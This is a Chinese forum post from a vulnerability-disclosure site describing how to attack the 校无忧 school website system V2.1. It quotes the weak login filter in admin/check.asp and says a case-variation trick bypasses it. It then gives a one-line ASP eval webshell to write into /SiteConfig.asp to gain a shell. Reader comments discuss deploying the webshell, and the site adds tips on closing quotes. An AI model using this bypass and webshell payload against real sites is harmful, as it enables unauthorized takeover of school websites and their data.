漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

校无忧系统 漏洞

#####################################################################
by Roker
以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。
[php]
if request("action")="login" then
Username=trim(request("admin_name"))
Password=trim(request("admin_pass"))
end if
If Instr(Username,"or")<>0 or Instr(Password,"or")<>0 or Instr(Username,"and")<>0 or Instr(Password,"and")<>0Then
response.write "



没事别搞人家后台,谢谢!
否则一切后果自负!
校无忧-Www.Xiao5u.Com
"
else
[/php]
这尼玛在逗我。。?

大小写绕过,

拿shell:
/SiteConfig.asp 处
"%><%eval(request("r"))%>
写入一句话。
他的 评选投票系统也是如此。

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 校无忧系统 漏洞

评论 4

  1. :cry: 为什么插完马是500错误

    全球小破孩 2013-12-01    回复
    • 是不是搞错了额啊,某些时候500也是可以连接点吧~

      0day5 2013-12-08    回复
      • 您好 小弟刚开始学习SQL注入 本想用无忧学校系统练手 绕过过滤后 到UPDATE时 还是不成功 想试试您的方法 可是有些不明白 还望指导

        卢克 2013-12-11    回复
        • update数据库么?这个就是往配置文件里面插马,注意前后的闭合。不然会报错 的,记得修改回来,不然整个网站就废掉了。

          0day5 2013-12-11    回复